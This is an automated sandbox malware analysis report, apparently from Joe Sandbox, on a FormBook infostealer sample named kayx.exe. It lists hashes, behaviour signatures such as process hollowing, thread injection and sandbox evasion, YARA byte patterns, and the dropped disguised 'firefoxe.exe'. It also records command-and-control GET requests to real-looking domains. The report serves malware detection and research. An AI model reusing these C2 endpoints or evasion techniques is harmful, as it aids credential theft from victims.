Loading ...

Play interactive tourEdit tour

Analysis Report kayx.exe

Overview

General Information

Sample Name:kayx.exe
Analysis ID:321226
MD5:a80e73a824b655491f54278b7a29467d
SHA1:f33ddffc223c9afa4e226d3567b990a8e44828e6
SHA256:bdcd13abdded8f4f709fb288fb78b4afff486854b3ea78ad378d11220a31c3c4
Tags:exeFormbook

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • kayx.exe (PID: 6524 cmdline: 'C:\Users\user\Desktop\kayx.exe' MD5: A80E73A824B655491F54278B7A29467D)
    • kayx.exe (PID: 6932 cmdline: C:\Users\user\Desktop\kayx.exe MD5: A80E73A824B655491F54278B7A29467D)
    • kayx.exe (PID: 6916 cmdline: C:\Users\user\Desktop\kayx.exe MD5: A80E73A824B655491F54278B7A29467D)
    • kayx.exe (PID: 6900 cmdline: C:\Users\user\Desktop\kayx.exe MD5: A80E73A824B655491F54278B7A29467D)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • firefoxe.exe (PID: 3032 cmdline: 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe' MD5: A80E73A824B655491F54278B7A29467D)
        • firefoxe.exe (PID: 2128 cmdline: 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe' MD5: A80E73A824B655491F54278B7A29467D)
        • mstsc.exe (PID: 6072 cmdline: C:\Windows\SysWOW64\mstsc.exe MD5: 2412003BE253A515C620CE4890F3D8F3)
          • cmd.exe (PID: 4816 cmdline: /c del 'C:\Users\user\Desktop\kayx.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 1632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000015.00000002.485444810.0000000002F00000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000015.00000002.485444810.0000000002F00000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x83c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8762:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14075:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x13b61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14177:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x142ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x916a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x12ddc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x9ee2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19157:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a1ca:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000015.00000002.485444810.0000000002F00000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16079:$sqlite3step: 68 34 1C 7B E1
    • 0x1618c:$sqlite3step: 68 34 1C 7B E1
    • 0x160a8:$sqlite3text: 68 38 2A 90 C5
    • 0x161cd:$sqlite3text: 68 38 2A 90 C5
    • 0x160bb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x161e3:$sqlite3blob: 68 53 D8 7F 8C
    00000011.00000002.396099862.0000000000830000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000011.00000002.396099862.0000000000830000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x83c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8762:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14075:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x13b61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14177:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x142ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x916a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x12ddc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x9ee2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19157:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a1ca:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 16 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      17.2.kayx.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        17.2.kayx.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x75c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7962:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x13275:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x12d61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x13377:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x134ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x836a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x11fdc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x90e2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18357:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x193ca:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        17.2.kayx.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x15279:$sqlite3step: 68 34 1C 7B E1
        • 0x1538c:$sqlite3step: 68 34 1C 7B E1
        • 0x152a8:$sqlite3text: 68 38 2A 90 C5
        • 0x153cd:$sqlite3text: 68 38 2A 90 C5
        • 0x152bb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x153e3:$sqlite3blob: 68 53 D8 7F 8C
        17.1.kayx.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          17.1.kayx.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x75c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7962:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x13275:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x12d61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x13377:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x134ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x836a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x11fdc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x90e2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18357:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x193ca:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 7 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus / Scanner detection for submitted sampleShow sources
          Source: kayx.exeAvira: detected
          Antivirus detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exeAvira: detection malicious, Label: TR/Dropper.MSIL.blecg
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exeReversingLabs: Detection: 45%
          Multi AV Scanner detection for submitted fileShow sources
          Source: kayx.exeVirustotal: Detection: 34%Perma Link
          Source: kayx.exeReversingLabs: Detection: 45%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000015.00000002.485444810.0000000002F00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.396099862.0000000000830000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.396027525.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.484279657.0000000000A00000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.396259639.0000000000980000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000001.351516494.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.352630853.00000000041E1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 17.2.kayx.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.1.kayx.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.1.kayx.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.2.kayx.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exeJoe Sandbox ML: detected
          Machine Learning detection for sampleShow sources
          Source: kayx.exeJoe Sandbox ML: detected
          Source: 17.2.kayx.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 17.1.kayx.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exeFile opened: C:\Users\user\AppData\
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exeFile opened: C:\Users\user\
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\
          Source: C:\Users\user\Desktop\kayx.exeCode function: 4x nop then pop edi
          Source: C:\Users\user\Desktop\kayx.exeCode function: 4x nop then pop edi
          Source: global trafficHTTP traffic detected: GET /bg8v/?dR-0T=Hsg8WmNsaLMOQIlEIMfuFbk4MqbSZJWeSLNd01xx1olwbrd2uyfvFyB8JS14b3uA3WpV&Fxl0dR=KdShEXiX HTTP/1.1Host: www.ghoster.agencyConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bg8v/?dR-0T=BcRzG6gD98FnRJnM8S7gZqeq6OFb5sR0iVW6Pm7cF5yWostREqJtYuV2Juo62Dzc0Jb1&Fxl0dR=KdShEXiX HTTP/1.1Host: www.jibenentreprenad.mobiConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 184.168.131.241 184.168.131.241
          Source: Joe Sandbox ViewIP Address: 184.168.131.241 184.168.131.241
          Source: Joe Sandbox ViewASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS
          Source: global trafficHTTP traffic detected: GET /bg8v/?dR-0T=Hsg8WmNsaLMOQIlEIMfuFbk4MqbSZJWeSLNd01xx1olwbrd2uyfvFyB8JS14b3uA3WpV&Fxl0dR=KdShEXiX HTTP/1.1Host: www.ghoster.agencyConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /bg8v/?dR-0T=BcRzG6gD98FnRJnM8S7gZqeq6OFb5sR0iVW6Pm7cF5yWostREqJtYuV2Juo62Dzc0Jb1&Fxl0dR=KdShEXiX HTTP/1.1Host: www.jibenentreprenad.mobiConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.ghoster.agency
          Source: explorer.exe, 00000012.00000000.377196648.000000000F640000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: explorer.exe, 00000012.00000000.377196648.000000000F640000.00000004.00000001.sdmpString found in binary or memory: http://crl.v
          Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000012.00000000.374682717.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: mstsc.exe, 00000015.00000002.487573696.000000000543D000.00000004.00000001.sdmpString found in binary or memory: https://www.jiben.se/bg8v/?dR-0T=BcRzG6gD98FnRJnM8S7gZqeq6OFb5sR0iVW6Pm7cF5yWostREqJtYuV2Juo62Dzc0Jb
          Source: firefoxe.exe, 00000013.00000002.483426018.000000000108B000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000015.00000002.485444810.0000000002F00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.396099862.0000000000830000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.396027525.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.484279657.0000000000A00000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.396259639.0000000000980000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000001.351516494.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.352630853.00000000041E1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 17.2.kayx.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.1.kayx.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.1.kayx.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.2.kayx.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000015.00000002.485444810.0000000002F00000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000015.00000002.485444810.0000000002F00000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.396099862.0000000000830000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.396099862.0000000000830000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.396027525.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.396027525.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000015.00000002.484279657.0000000000A00000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000015.00000002.484279657.0000000000A00000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.396259639.0000000000980000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.396259639.0000000000980000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000001.351516494.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000001.351516494.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.352630853.00000000041E1000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.352630853.00000000041E1000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 17.2.kayx.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 17.2.kayx.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 17.1.kayx.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 17.1.kayx.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 17.1.kayx.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 17.1.kayx.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 17.2.kayx.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 17.2.kayx.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\kayx.exeCode function: 1_2_05C4AAF0 NtUnmapViewOfSection,
          Source: C:\Users\user\Desktop\kayx.exeCode function: 1_2_05C4AAE8 NtUnmapViewOfSection,
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00417B90 NtCreateFile,
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00417C40 NtReadFile,
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00417CC0 NtClose,
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00417D70 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00417B4A NtCreateFile,
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00417BE2 NtCreateFile,
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00417B8A NtCreateFile,
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00417CBF NtClose,
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E498F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E49860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E49840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E499A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E49910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E49A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E49A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E49A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E495D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E49540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E496E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E49660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E49FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E497A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E49780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E49710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E498A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E4B040 NtSuspendThread,
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E49820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E499D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E49950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E49A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E49A10 NtQuerySection,
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E4A3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E49B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E495F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E49560 NtWriteFile,
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E49520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E4AD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E496D0 NtCreateKey,
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E49670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E49650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E49610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E49760 NtOpenProcess,
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E49770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E4A770 NtOpenThread,
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E49730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E4A710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_1_00417B90 NtCreateFile,
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_1_00417C40 NtReadFile,
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_1_00417CC0 NtClose,
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_1_00417D70 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_1_00417B4A NtCreateFile,
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_1_00417BE2 NtCreateFile,
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_1_00417B8A NtCreateFile,
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_1_00417CBF NtClose,
          Source: C:\Users\user\Desktop\kayx.exeCode function: 1_2_01850C1C
          Source: C:\Users\user\Desktop\kayx.exeCode function: 1_2_05C42938
          Source: C:\Users\user\Desktop\kayx.exeCode function: 1_2_05C46D00
          Source: C:\Users\user\Desktop\kayx.exeCode function: 1_2_05C46D10
          Source: C:\Users\user\Desktop\kayx.exeCode function: 1_2_05C426C0
